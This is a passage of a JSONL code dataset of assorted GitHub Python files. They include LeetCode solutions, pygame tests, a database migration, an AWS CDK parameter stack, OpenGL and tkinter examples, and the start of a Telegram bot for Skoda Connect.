1AC, no trick\nclass Solution:\n def getMaximumXor(self, nums: List[int], maximumBit: int) -> List[int]:\n mask = (1 << maximumBit) - 1\n cur = 0\n ax = []\n for x in nums:\n cur ^= x\n ax.append(cur)\n\n res = []\n n = len(nums)\n for i in range(n):\n res.append(mask ^ ax[n - 1 - i])\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1501-2000/1829_maximum-xor-for-each-query_1_AC.py","file_name":"1829_maximum-xor-for-each-query_1_AC.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"70392681833","text":"from pathlib import Path\nfrom unittest import mock\n\ntry:\n import jogo\nexcept ModuleNotFoundError:\n pass\n\ndef test_carregamento_fontes():\n with mock.patch('jogo.pygame') as mockg:\n mockg.font.get_default_font.side_effects = ['a', 'a']\n\n font1_mock = mock.Mock()\n font1_mock.render.return_value = 'OK1'\n font2_mock = mock.Mock()\n font2_mock.render.return_value = 'OK2'\n\n mockg.font.Font.side_effect = [\n font1_mock, font2_mock\n ]\n\n try:\n w, assets = jogo.inicializa()\n except (ValueError, TypeError):\n # Não retornou 2 elementos\n raise AssertionError('inicializa deverá retornar a janela criada (window) e o dicionário de recursos do jogo (assets)')\n\n assert type(assets) == dict, 'assets deve ser um dicionário.'\n for k in ['fonte_16', 'fonte_24']:\n assert k in assets, f'assets[\"{k}\"] não existe'\n\n assert assets['fonte_16'] != assets['fonte_24'], 'fonte_16 e fonte_24 são idênticos'\n assert assets['fonte_16'] == font1_mock or assets['fonte_16'] == font2_mock, 'fonte_16 não foi criado usando pygame.font.Font'\n assert assets['fonte_24'] == font1_mock or assets['fonte_24'] == font2_mock, 'fonte_16 não foi criado usando pygame.font.Font'\n\n\ndef test_desenho_fontes():\n font16_render = mock.Mock()\n font16_mock = mock.Mock()\n font16_mock.render.return_value = font16_render\n\n font24_render = mock.Mock()\n font24_mock = mock.Mock()\n font24_mock.render.return_value = font24_render\n\n assets = {\n 'fonte_16': font16_mock,\n 'fonte_24': font24_mock,\n }\n window = mock.Mock()\n\n with mock.patch('jogo.pygame') as mockg:\n jogo.desenha(window, assets)\n\n assert assets['fonte_16'].render.mock_calls == [mock.call('Fonte tamanho 16', True, (255, 255, 255))], 'A chamada a render na fonte de tamanho 16 não foi feita com os argumentos corretos.'\n assert assets['fonte_24'].render.mock_calls == [mock.call('Fonte tamanho 24', True, (0, 0, 255))], 'A chamada a render na fonte de tamanho 16 não foi feita com os argumentos corretos.'\n\n assert mock.call(font16_render, (10, 20)) in window.blit.mock_calls, 'O desenho do texto de fonte 16 foi feito incorretamente'\n assert mock.call(font24_render, (10, 70)) in window.blit.mock_calls, 'O desenho do texto de fonte 24 foi feito incorretamente'\n","repo_name":"prady001/projects","sub_path":"pygame/desenhando/exercises/texto_fontes/test_jogo.py","file_name":"test_jogo.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69948646312","text":"\"\"\"empty message\n\nRevision ID: 36d7a8641fd1\nRevises: cf986a7875ac\nCreate Date: 2020-06-02 20:37:40.752144\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '36d7a8641fd1'\ndown_revision = 'cf986a7875ac'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('high_commands',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('date_modified', sa.DateTime(), nullable=True),\n sa.Column('coach_id', sa.Integer(), nullable=False),\n sa.Column('level', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['coach_id'], ['coaches.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('coach_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('high_commands')\n # ### end Alembic commands ###\n","repo_name":"ttrnecka/imperium","sub_path":"migrations/versions/36d7a8641fd1_.py","file_name":"36d7a8641fd1_.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"37592047124","text":"# -*- coding: utf-8 -*-\n# **************************************************************************\n# *\n# * Authors: J.M. De la Rosa Trevin (jmdelarosa@cnb.csic.es)\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\n\nimport pyworkflow.object as pwobj\nfrom pyworkflow.gui.tree import TreeProvider\n\n\nclass SummaryProvider(TreeProvider):\n \"\"\"Create the tree elements for a Protocol run\"\"\"\n def __init__(self, protocol):\n TreeProvider.__init__(self)\n self.protocol = protocol\n self.getColumns = lambda: [('Name', 300), ('Output', 150),\n ('Number', 100)]\n self._parentDict = {}\n self.acquisition = []\n self.refreshObjects()\n\n def getObjects(self):\n return self._objects\n\n def refreshObjects(self):\n objects = []\n\n def addObj(objId, name, output='', size='', parent=None):\n obj = pwobj.Object(objId=objId)\n obj.name = name\n obj.output = output\n obj.outSize = size\n obj._objParent = parent\n objects.append(obj)\n return obj\n\n runs = [p.get() for p in self.protocol.inputProtocols]\n g = self.protocol.getProject().getGraphFromRuns(runs)\n\n nodes = g.getRoot().iterChildsBreadth()\n\n for n in nodes:\n prot = n.run\n pobj = addObj(prot.getObjId(),\n '%s (id=%s)' % (prot.getRunName(), prot.strId()))\n\n for outName, outSet in prot.iterOutputAttributes(pwobj.Set):\n outSet.load()\n outSet.loadAllProperties()\n addObj(outSet.getObjId(), '', outName, outSet.getSize(), pobj)\n outSet.close()\n # Store acquisition parameters in case of the import protocol\n from pyworkflow.em import ProtImportImages\n #NOTE by rmarabini do not use the angstrom symbol instead of A\n #it breaks html production in the monitor:\n #UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 \n if isinstance(prot, ProtImportImages):\n self.acquisition = [(\"Microscope Voltage: \",\n prot.voltage.get()),\n (\"Spherical aberration: \",\n prot.sphericalAberration.get()),\n (\"Magnification: \",\n prot.magnification.get()),\n (\"Pixel Size (A/px): \",\n outSet.getSamplingRate())\n ]\n\n self._objects = objects\n\n def getObjectInfo(self, obj):\n info = {'key': obj.strId(),\n 'parent': obj._objParent,\n 'text': obj.name,\n 'values': (obj.output, obj.outSize),\n 'open': True\n }\n\n return info\n","repo_name":"I2PC/scipion-web","sub_path":"pyworkflow/em/protocol/monitors/summary_provider.py","file_name":"summary_provider.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13600316418","text":"class MyHashSet:\n\n def __init__(self):\n self.N = 999\n self.mass = [[] for x in range(self.N)]\n\n def add(self, key: int) -> None:\n index = key % self.N\n for x in self.mass[index]:\n if x == key:\n return\n self.mass[index].append(key)\n print(self.mass)\n\n def remove(self, key: int) -> None:\n index = key % self.N\n for i, x in enumerate(self.mass[index]):\n if x == key:\n self.mass[index].pop(i)\n return\n\n def contains(self, key: int) -> bool:\n index = key % self.N\n for x in self.mass[index]:\n if x == key:\n return True\n return False\n\n\n# Your MyHashSet object will be instantiated and called as such:\nobj = MyHashSet()\nobj.add(3)\nobj.remove(3)\n","repo_name":"Alset-Nikolas/Algorithms-Letcode","sub_path":"Easy/4/705.DesignHashSet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24215061710","text":"n = int(input())\n\ngroup_word = 0\nfor _ in range(n):\n word = input()\n error = 0\n for index in range(len(word)-1):\n if word[index] != word[index+1]:\n new_word = word[index+1:]\n if new_word.count(word[index])>0: # 남은 문자열에서 현재글자가 있을때\n error += 1\n if error==0:\n group_word+=1\npprint(group_word)\n \n#@@@@@\n","repo_name":"kimsunwoo00/6-","sub_path":"백준 1316번.py","file_name":"백준 1316번.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71851486952","text":"from tkinter import *\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\n\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\n\ndef Upload2():\n global window\n types = [('PNG Files', '*.png'),('Jpg Files', '*.jpg') ]\n filename = filedialog.askopenfilename(filetypes=types)\n canvas = Canvas()\n image = Image.open(filename)\n image = image.resize((350,350), Image.ANTIALIAS)\n image = ImageTk.PhotoImage(image)\n logo = Image.open(\"Logo.png\")\n logo = logo.resize((113,38), Image.ANTIALIAS)\n logo = ImageTk.PhotoImage(logo)\n window.logo = logo\n window.image = image\n canvas.create_image(200, 100, image=image)\n canvas.create_image(310,250, image=logo)\n canvas.grid(row=3, column=0, columnspan=4, rowspan=4)\n\n\n\nwindow = Tk()\nwindow.title(\"Image Watermarking\")\nwindow.config()\nwindow.geometry(\"450x400\")\nlabel = Label(text=\"Upload an Image\", font=(\"Montserat\", 20, \"bold\"), fg=\"black\",padx=102)\nlabel.grid(column=0, row=0)\nbutton = Button(window, text=\"Upload File\",width=20, command=Upload2)\nbutton.grid(column=0, row=1)\n\n\n\n\n\n\n\n\n\nwindow.mainloop()","repo_name":"Palharess/Image-watermarking-GUI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28934201338","text":"# -*- coding: utf-8 -*-\nimport logging\n\n\ndef is_isbn(value):\n short_value = value.replace('-', '') if '-' in value else value\n length_of_value = len(value)\n if (length_of_value == 13 or length_of_value == 10) and short_value.isdigit():\n return 'isbn'\n return 'keyword'\n\n\ndef get_logger():\n logging.basicConfig(format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s',\n level=logging.DEBUG)\n logger = logging.getLogger()\n return logger\n\n\nclass A(object):\n def run(self):\n return 3\n\n\nif __name__ == '__main__':\n a = A()\n a.run()\n","repo_name":"Mrfranken/new_fisher","sub_path":"app/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35098586685","text":"#!/usr/bin/python3\nimport OpenGL.GL as GL\nimport pathlib\nimport sys\n\n# Get the package directory\npackage_dir = str(pathlib.Path(__file__).resolve().parents[2])\n# Add the package directory into sys.path if necessary\nif package_dir not in sys.path:\n sys.path.insert(0, package_dir)\n\nfrom py3d.core.base import Base\nfrom py3d.core.utils import Utils\n\n\nclass Example(Base):\n \"\"\" Render a single point \"\"\"\n def initialize(self):\n print(\"Initializing program...\")\n # Initialize program #\n # vertex shader code\n vs_code = \"\"\"\n void main()\n {\n gl_Position = vec4(0.0, 0.0, 0.0, 1.0);\n }\n \"\"\"\n # fragment shader code\n fs_code = \"\"\"\n out vec4 fragColor;\n void main()\n {\n fragColor = vec4(1.0, 1.0, 0.0, 1.0);\n }\n \"\"\"\n # Send code to GPU and compile; store program reference\n self.program_ref = Utils.initialize_program(vs_code, fs_code)\n # Set up vertex array object #\n vao_ref = GL.glGenVertexArrays(1)\n GL.glBindVertexArray(vao_ref)\n # render settings (optional) #\n # Set point width and height\n GL.glPointSize(10)\n\n def update(self):\n # Select program to use when rendering\n GL.glUseProgram(self.program_ref)\n # Renders geometric objects using selected program\n GL.glDrawArrays(GL.GL_POINTS, 0, 1)\n\n\n# Instantiate this class and run the program\nExample().run()\n\n","repo_name":"ax-va/PyOpenGL-Pygame-Stemkoski-Pascale-2021","sub_path":"py3d/examples/example-2-02-single-point.py","file_name":"example-2-02-single-point.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"38940463516","text":"import json\nimport os\nimport time\nfrom random import Random\n\nfrom redis import Redis\n\nREDIS_HOST = os.getenv('REDIS_SERVICE_HOST', 'localhost')\nREDIS_PORT = os.getenv('REDIS_SERVICE_PORT', '6379')\n\nr = Redis(host=REDIS_HOST, port=int(REDIS_PORT))\n\nwhile True:\n print('publishing events:')\n for i in range(5):\n event = {'wait': Random().randint(10, 20)}\n r.lpush('events', json.dumps(event))\n print(f'- {event}')\n\n print('')\n print('sleeping for 10s')\n time.sleep(10)\n print('')\n","repo_name":"scottzach1/Redis-Keda","sub_path":"publisher/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28484196614","text":"# https://leetcode.com/problems/palindrome-partitioning-ii/description/\n\nclass Solution:\n def minCut(self, s: str) -> int:\n def getPalindromes(l, r):\n while l >= 0 and r < len(s) and s[l] == s[r]:\n palindromes[l].add(r)\n l -= 1\n r += 1\n \n palindromes = defaultdict(set)\n for i in range(len(s)):\n getPalindromes(i, i)\n getPalindromes(i, i + 1)\n \n @cache\n def minCuts(start):\n if start >= len(s):\n return -1\n \n cuts = inf\n for end in palindromes[start]:\n cuts = min(cuts, 1 + minCuts(end + 1))\n \n return cuts\n \n return minCuts(0)\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_54/palindrome-partitioning-ii.py","file_name":"palindrome-partitioning-ii.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1437602380","text":"import sys, time, random\nfrom collections import deque, defaultdict\ninput = lambda : sys.stdin.readline().strip()\nintput = lambda : map(int, input().split())\nsys.setrecursionlimit(1 << 20)\n\n# this might unironically be the singular worst\n# program I have ever authored in my career.\ndef solve():\n global passed, log, st\n N, M = intput()\n A = [0] * (N+1)\n B = [0] * (N+1)\n indeg = [0] * (M+1)\n oudeg = [0] * (M+1)\n edges = defaultdict(set)\n prefs = [[set(), set()] for _ in range(M+1)]\n adj = [[] for _ in range(M+1)]\n adj2 = [[] for _ in range(M+1)]\n for i in range(1,N+1):\n a, b = intput()\n A[i], B[i] = a,b\n adj[a] += [b]\n adj2[b] += [a]\n prefs[a][0] |= {i}\n prefs[b][1] |= {i}\n edges[ (a,b) ] |= {i}\n indeg[b] += 1\n oudeg[a] += 1\n st = time.time()\n\n def getComps():\n vis = [0] * (M+1)\n res = defaultdict(set)\n def dfs(u, c):\n vis[u] = 1\n res[c].add(u)\n for ad in (adj, adj2): # extraordinarily dumb\n for v in ad[u]:\n if not vis[v]:\n dfs(v, c)\n for i in range(1, M+1):\n if not vis[i]:\n dfs(i, i)\n\n i = 0\n edgecomps = defaultdict(set)\n for comp in res.values():\n sq = set()\n for c in comp:\n for j in prefs[c][0]:\n sq.add(j)\n for j in prefs[c][1]:\n sq.add(j)\n if sq:\n edgecomps[i] = sq\n i += 1\n return edgecomps\n\n comps = getComps()\n def hunger(L):\n cur = set()\n for x in L:\n if A[x] not in cur:\n cur.add(A[x])\n elif B[x] not in cur:\n cur.add(B[x])\n return N - len(cur), cur\n\n ans = []\n done = [0] * (M+1)\n q = deque()\n for i in range(1, M+1):\n if indeg[i] == 0:\n q.append(i)\n reserve = list(range(1, M + 1))\n reserve.sort(key=lambda x: (indeg[x], -oudeg[x])) # no idea\n rc = 0\n while q or rc < M:\n if not q:\n for j in range(rc, M):\n r = reserve[j]\n if not done[r]:\n q.append(r)\n rc = j + 1\n break\n if not q: break\n u = q.popleft()\n pos = sorted(adj[u], key=lambda x: (-done[x], -oudeg[x], indeg[x]))\n if not done[u] and pos: # delete an edge\n done[u] = True\n v = pos[0]\n indeg[v] -= 1\n if indeg[v] <= 0 and not done[v]:\n q.append(v)\n try: ans += [edges[(u,v)].pop()]\n except: pass\n pos = sorted(pos[1:], key=lambda x: (-oudeg[x], -indeg[x]))\n for v in pos: # take edges\n if not done[v]:\n indeg[v] -= 1\n try: ans += [edges[(u, v)].pop()]\n except: pass\n if indeg[v] <= 0:\n done[v] = True\n q.append(v)\n done[u] = True\n\n def bubble(p=None):\n ans = []\n fp = set()\n if not p: p = range(1, N+1)\n for i in p:\n if A[i] not in fp:\n fp.add(A[i])\n ans += [i]\n elif B[i] not in fp:\n fp.add(B[i])\n ans += [i]\n else: # greedy swap\n for j in range(len(ans)): # bubble upwards or something\n # if swapping i,j would allow i to not be hungry, do it\n # no idea why this would work\n t = ans[:]\n tj = t[j]\n t[j] = i\n Q = hunger(t)[1]\n if len(Q) < len(fp): continue\n if A[tj] in Q and B[tj] in Q: continue\n if A[tj] not in Q:\n Q.add(A[tj])\n elif B[tj] not in Q:\n Q.add(B[tj])\n t += [tj]\n fp = Q\n ans = t\n break\n else:\n ans += [i]\n return N-len(fp), ans\n\n # def pfxmethod():\n # done = [0] * (M+1)\n # reserve = sorted(range(1, M+1), key=lambda x:(-(icp[x]==0), -ocp[x]))\n # for fs in range(1,N):\n # second = {}\n # for i in range(fs):\n # r = reserve[i]\n # for j in prefs[r][0]:\n # b = B[j]\n # for c in prefs[b][1]:\n #\n # ans += [r]\n\n def perCompCheese(its=20):\n tans = []\n for c in comps.values():\n c = list(c)\n bh = hunger(c)\n for j in range(its):\n p = c[:]\n random.shuffle(p)\n h = hunger(p)\n if h < bh:\n bh = h\n c = p\n tans += c\n return hunger(tans)[0], tans\n\n rem = set(range(1, N + 1)) - set(ans)\n ans += list(rem)\n h = hunger(ans)[0]\n\n if N <= 150:\n h2, ans2 = bubble()\n h3, ans3 = bubble(ans)\n if h2 < h:\n h = h2\n ans = ans2\n if h3 < h:\n h = h3\n ans = ans3\n for j in range(25):\n p = list(range(1,N+1))\n random.shuffle(p)\n h2, ans2 = bubble(p)\n h3 = hunger(p)[0]\n if h2 < h:\n h = h2\n ans = ans2\n if h3 < h:\n h = h3\n ans = p\n # else:\n # for j in range(1):\n # p = list(range(1, N + 1))\n # random.shuffle(p)\n # h2 = hunger(p)[0]\n # if h2 < h:\n # h = h2\n # ans = p\n\n its = 20 if N <= 150 else 1\n qwe, qwe2 = perCompCheese(its)\n if qwe < h:\n h = qwe\n ans = qwe2\n\n # ANS, EXS = check(A, B, N, M)\n # print('real ans:', ANS)\n # print('example: ', *EXS[0])\n # for e in EXS:\n # print(*e)\n # if h == ANS: passed += 1\n # elif LOG:\n # log.write(f\"{N} {M}\\n\")\n # for i in range(1, N+1):\n # log.write(f\"{A[i]} {B[i]}\\n\")\n # log.write(\"\\n\")\n\n # outf = open('/Users/henryliu/Desktop/DEBUG/py/77.out', 'w')\n # for e in EXS:\n # outf.write(' '.join(map(str,e)) + '\\n')\n # outf.close()\n return h, ans\n\nif __name__ == '__main__':\n st = 0\n c, s = solve()\n # print('time:', time.time() - st)\n print(c)\n for u in s:\n print(u)\n","repo_name":"henryliuser/hliu-cp","sub_path":"usaco/silver/cereal22.py","file_name":"cereal22.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"21543523272","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\nclass Parameters:\n def __init__(self):\n \"\"\"\n Подклассы должны инициализировать атрибуты:\n self.prm параметрами и значениями по-умолчанию,\n self.type соответствующими типами,\n self.help соответствующими описаниями параметров.\n \"\"\"\n pass\n\n def ok(self):\n \"\"\"\n Проверяет определены ли аттрибуты prm, type и help.\n \"\"\"\n if hasattr(self, 'prm') and isinstance(self.prm, dict) and \\\n hasattr(self, 'type') and isinstance(self.type, dict) and \\\n hasattr(self, 'help') and isinstance(self.help, dict):\n return True\n else:\n raise ValueError(f'The constructor in class {self.__class__.__name__} does not initialize the dictionaries:\\n\\t self.prm, self.type, self.help')\n\n def _illegal_parameter(self, name):\n \"\"\"\n Генерирует исключение о недопустимом параметре.\n \"\"\"\n raise ValueError(f'Parameter {name} is not registred. \\nLegal parameters are \\n{list(self.prm.keys())}')\n\n def set(self, **parameters):\n \"\"\"\n Устанавливается один или несколько параметров.\n \"\"\"\n for name in parameters:\n if name in self.prm:\n self.prm[name] = parameters[name]\n else:\n self._illegal_parameter(name)\n\n def get(self, name):\n \"\"\"\n Возвращает значение одного или нескольких параметров.\n \"\"\"\n if isinstance(name, (list, tuple)):\n for n in name:\n if n not in self.prm:\n self._illegal_parameter(name)\n return [self.prm[n] for n in name]\n else:\n if name not in self.prm:\n self._illegal_parameter(name)\n return self.prm[name]\n\n def __getitem__(self, name):\n \"\"\"\n Допускается доступ к параметру по индексу obj[name].\n \"\"\"\n return self.get(name)\n\n def __setitem__(self, name, value):\n \"\"\"\n Допускается задание значения параметра по индексу obj[name] = value\n \"\"\"\n return self.set(name=value)\n\n def define_command_line_options(self, parser=None):\n self.ok()\n if parser is None:\n import argparse\n parser = argparse.ArgumentParser()\n\n for name in self.prm:\n tp = self.type[name] if name in self.prm else str\n help = self.help[name] if name in self.help else None\n parser.add_argument(\n '--' + name,\n default=self.get(name),\n metavar=name,\n type=tp,\n help=help\n )\n return parser\n\n def init_from_command_line(self, args):\n for name in self.prm:\n self.prm[name] = getattr(args, name)\n\n\nclass Material(Parameters):\n def __init__(self):\n self.prm = dict(Name='', Density=1000.,\n Tbf=0.0, Wtot=0.,\n Conductivity={'f': 2.11,'th':1.83},\n Capacity={'f': 2.02e6, 'th': 2.44e6})\n self.type = dict(Name=str, Density=float, Tbf=float, Wtot=float,\n Conductivity=dict, Capacity=dict)\n self.help = dict(Name='Name of material', Density='Dry density',\n Tbf='Freezing point', Wtot='Total moisture',\n Conductivity='Thermal conductivity:\"f\" - frozen state, \"th\" - thawed state',\n Capacity='Volumetric heat capacity:\"f\" - frozen state, \"th\" - thawed state')\n self.prm['Tbf_K'] = self.prm['Tbf'] + 273.15\n\n def set(self, **parameters):\n super().set(**parameters)\n self.prm['Tbf_K'] = self.prm['Tbf'] + 273.15\n\nclass Problem(Parameters):\n \"\"\"\n Физические параметры для задачи Стефана\n \"\"\"\n def __init__(self, Soil):\n self.prm = dict(H=20, M=Soil, Lw=3.34e5, A=10, T0=1.5, Tbnd=-27+273.15, T_end=300)\n self.prm['Tbf'] = self['M']['Tbf_K']\n self.prm['L'] = self['M']['Density']*self['M']['Wtot']*self['Lw']\n self.type = dict(H=float, M=Material, Lw=float, A=float, T0=float, Tbnd=float, T_end=int,\n Tbf=self['M'].help['Tbf'], L=float)\n self.help = dict(H='Depth of soil', M='Soil material', Lw='Latent heat of freezing of water',\n A='Smoothing coefficient', T0='Initial temperature of soil',\n Tbnd='Upper boundary temperature', T_end='End time of simulation',\n Tbf=self['M']['Tbf'], L='Volumetric latent heat of freezing of soil water')\n\n def w_u(self, T):\n T = np.array([T]) if not isinstance(T, np.ndarray) else T\n return np.where(T < self['Tbf'], 1./(1 + self['A']*(self['Tbf']-T)), 1.)\n\n def w_u_dT(self, T):\n T = np.array([T]) if not isinstance(T, np.ndarray) else T\n return np.where(T < self['Tbf'], self['A']/(1. + self['A']*(self['Tbf']-T))**2, 0.)\n \n def C(self, T):\n Cf = self['M']['Capacity']['f']\n Cth = self['M']['Capacity']['th']\n return Cf + (Cf-Cth)*self.w_u(T)\n\n def lmbda(self, T):\n lmbdaf = self['M']['Conductivity']['f']\n lmbdath = self['M']['Conductivity']['th']\n return lmbdaf + (lmbdaf-lmbdath)*self.w_u(T)\n\n def C_eff(self, T):\n return self.C(T) + self['L']*self.w_u_dT(T)\n\n\n # def T_exact(self):\n\n","repo_name":"slemeshevsky/stefan","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43124220336","text":"import boto3\n\nfrom aws_cdk.core import (\n Construct,\n Stack,\n Tags,\n)\nfrom aws_cdk.aws_ssm import StringParameter\nfrom typing import Optional\n\nfrom openttd.enumeration import Maturity\n\ng_parameter_store = None # type: Optional[ParameterStoreStack]\nssm_client = boto3.client(\"ssm\")\n\n\nclass ParameterResult:\n def __init__(self, parameter, name):\n self.parameter = parameter\n self.name = name\n\n\nclass ParameterStoreStack(Stack):\n \"\"\"\n Stack to create SSM Parameters with.\n\n Parameters are created in a single stack, as many other stacks use the\n Parameters as input. For CloudFormation to work, those entries already\n have to exist before a stack can be created.\n \"\"\"\n\n def __init__(self, scope: Construct, id: str, *, maturity: Maturity, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n\n global g_parameter_store\n\n Tags.of(self).add(\"Stack\", \"Common-ParameterStore\")\n\n self._maturity = maturity.value\n\n if g_parameter_store is not None:\n raise Exception(\"Only a single ParameterStoreStack instance can exist\")\n g_parameter_store = self\n\n def get_parameter_name(self, name: str) -> str:\n return f\"/{self._maturity}{name}\"\n\n def add_string(self, name: str, default: str) -> ParameterResult:\n if not name.startswith(\"/\"):\n raise Exception(\"Please use a path for a parameter name\")\n parameter_name = self.get_parameter_name(name)\n\n parameter = StringParameter(\n self,\n parameter_name,\n string_value=default,\n parameter_name=parameter_name,\n )\n\n return ParameterResult(parameter, parameter_name)\n\n def add_secure_string(self, name: str) -> ParameterResult:\n if not name.startswith(\"/\"):\n raise Exception(\"Please use a path for a parameter name\")\n parameter_name = self.get_parameter_name(name)\n\n res = ssm_client.describe_parameters(ParameterFilters=[{\"Key\": \"Name\", \"Option\": \"Equals\", \"Values\": [parameter_name]}])\n if not len(res[\"Parameters\"]):\n print(f\"ERROR: create SecureString '{parameter_name}' manually (CloudFormation currently can't create those)\")\n\n parameter = StringParameter.from_secure_string_parameter_attributes(\n self,\n parameter_name,\n parameter_name=parameter_name,\n # 'version' is just a dummny value, as in our usage we only care\n # about the ASN (which is identical for every version).\n version=1,\n )\n\n return ParameterResult(parameter, parameter_name)\n\n\ndef add_string(name: str, default: str) -> ParameterResult:\n if g_parameter_store is None:\n raise Exception(\"No ParameterStoreStack instance exists\")\n\n return g_parameter_store.add_string(name, default=default)\n\n\ndef add_secure_string(name: str) -> ParameterResult:\n if g_parameter_store is None:\n raise Exception(\"No ParameterStoreStack instance exists\")\n\n return g_parameter_store.add_secure_string(name)\n\n\ndef get_parameter_name(name: str) -> str:\n if g_parameter_store is None:\n raise Exception(\"No ParameterStoreStack instance exists\")\n\n return g_parameter_store.get_parameter_name(name)\n","repo_name":"OpenTTD/aws-infra","sub_path":"openttd/stack/common/parameter_store.py","file_name":"parameter_store.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33858136050","text":"import os\nimport re\nimport requests\nimport telegram\nfrom telegram.ext import Application, CommandHandler, CallbackQueryHandler, ConversationHandler, MessageHandler, filters\nfrom core.connect_service import SkodaConnectService, get_vehicle_base_info\n\n\nTOKEN = os.getenv('TOKEN')\nCLIENT_ID = 'YOUR_CLIENT_ID'\nCLIENT_SECRET = 'YOUR_CLIENT_SECRET'\nREDIRECT_URI = 'YOUR_REDIRECT_URI'\n\n# Conversation states\nEMAIL, PASSWD, CAR_SELECTION, ACTION_SELECTION = range(4)\n\n\ndef vehicle_info_normalization(vehicle):\n vehicle_info = get_vehicle_base_info(vehicle)\n vehicle_name = f'{vehicle_info[\"model\"]} ' \\\n f'{vehicle_info[\"manufactured\"][0:4]} ' \\\n f'{vehicle_info[\"engine_capacity\"]} ' \\\n f'{vehicle_info[\"engine_type\"]}'\n return vehicle_name\n\n\ndef validate_email(email):\n return bool(re.match(r\"[^@]+@[^@]+\\.[^@]+\", email))\n\n\nasync def start(update, context):\n # authorization_url = get_authorization_url()\n user = update.effective_user\n\n if context.user_data:\n return ConversationHandler.END\n await update.message.reply_html(\n f'Привіт, {user.full_name}! \\n'\n f'З моєю допомогою ти можеш керувати своєю автівкою Skoda! \\n'\n '\\n'\n 'Мене лише потрібно синхронізувати із твоїм обліковим записом Skoda Connect, а про все інше я подбаю! 💚\\n'\n '\\n'\n )\n await update.message.reply_text(\n rf'📧 Відправ мені свою електронну адресу, асоційовану з акаунтом у сервісі Skoda Connect'\n )\n\n return EMAIL\n\n\nasync def email(update, context) -> int:\n '''Get email from user to authorize in Skoda Connect service.'''\n chat_id = update.message.chat_id\n text = update.message.text\n\n if not validate_email(text):\n await context.bot.send_message(chat_id=chat_id, text='Напиши будь ласка коректну електронну адресу!')\n return EMAIL\n\n context.user_data['email'] = text\n await update.message.reply_text(f'🔑 Тепер відправ мені пароль')\n\n return PASSWD\n\n\nasync def passwd(update, context) -> int:\n '''Get password from user to authorize in Skoda Connect service'''\n text = update.message.text\n context.user_data['password'] = text\n await update.message.reply_text(f'🔄 Авторизуюсь у сервісі Skoda Connect...')\n user_data = context.user_data\n\n conn_service = SkodaConnectService(user_data.get('email'), user_data.get('password'))\n await conn_service.session_init()\n # connection instance\n connection = conn_service.get_connection_instance()\n\n if conn_service is not None:\n await update.message.reply_text(f'✅ Авторизація успішна! Отримую дані про твої авто... 🚗 ')\n await 